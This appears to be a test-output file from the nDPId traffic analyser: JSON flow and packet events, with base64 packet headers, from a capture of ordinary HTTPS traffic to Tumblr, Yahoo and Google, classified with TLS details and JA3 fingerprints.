-00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwVJeVyjqfgBBI2yKLAAABAQgKqXtZHsLc+ww="} 
-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3N5hBwa5pgBAB9TOKAAABAQgKqXtZHsLc+w0="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOpKNiTUmPgBAFOCVEAAABAQgKqXtZHsLc+ww="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2790,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108789,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBuhmLaKJd8MhgBAN560UAAABAQgKwt2r5al1DDM="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2796,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JXKOp\/xMFSYgBAPnfW6AAABAQgKwt2r7Kl1DlE="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2797,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBrmkkNzeZgBALy8PxAAABAQgKwt2r7al1DgU="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108805,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJNSY8GjqSkgBAMILKCAAABAQgKwt2r9ql1FBI="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108895,"flow_last_seen":1605292108895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292108895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605292108895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108895,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1IAAAAAoAL9IHkiAAACBAWgBAIICgXJqEYAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2848,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605292108917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108917,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAMAATQMqAcsBIEmLB5kd7IUo3\/YpAbveCh3iVUV6pXdToBJXgDxxAAACBAV4AQMDAwQCCArC3axnBcmoRg=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2849,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605292108917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108917,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1Md4lVGgBAB+8BsAAABAQgKBcmoXMLdrGc="} 
-00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292114506,"flow_last_seen":1605292114506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292114506,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605292114506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114506,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iknWH70O\/fgBATex8tAAABAQgKqXtvnsLdEcs="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12580,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114736,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvQ79+YpJ1igBBY1dkNAAABAQgKwt3C3al6v1A="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14179,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14179,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duJjvT55jAgBAB9d1JAAABAQgKVGZuDcLdE7E="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14180,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14180,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCRbVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADwVgBu1ozjhE9MAHmgBAB9RZAAAABAQgK5fXM6cLdEu0="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14181,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14181,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gA8lZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqlIBu\/+4ugmfFZgCgBAB9UmMAAABAQgKTADwSsLdGmw="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14182,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14182,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBu\/tACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACACjDQBuwRHeTthOU5lgBAB9RTKAAABAQgKi91SNsLdGI4="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14183,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14183,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gAlISACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsooBu5EKNZ7ythfhgBAB9RDDAAABAQgKWJK\/EMLdGI8="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14184,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14184,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBlBRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwTgBu2jzM2ULiifpgBAB9R7MAAABAQgK2Fskl8LdF\/4="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14185,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14185,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBTnWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwTYBuwdwDB5je19MgBAC+RdtAAABAQgK2Fskl8LdF9E="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14186,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14186,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCDsgACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAO4bwBu7dGlx3VVkGGgBAB9ZNXAAABAQgKuCcas8LdF48="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14187,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14187,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gBC50ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADwYoBu\/frxKCU+7xigBACJCsCAAABAQgK5fXM6cLdFzo="} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116554,"pkt":"qtsDr8lk5EKm5WPyht1gCjT0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADrIQBu3CsbiISBiplgBAJFEMHAAABAQgKZRk18sLdF+A="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14189,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
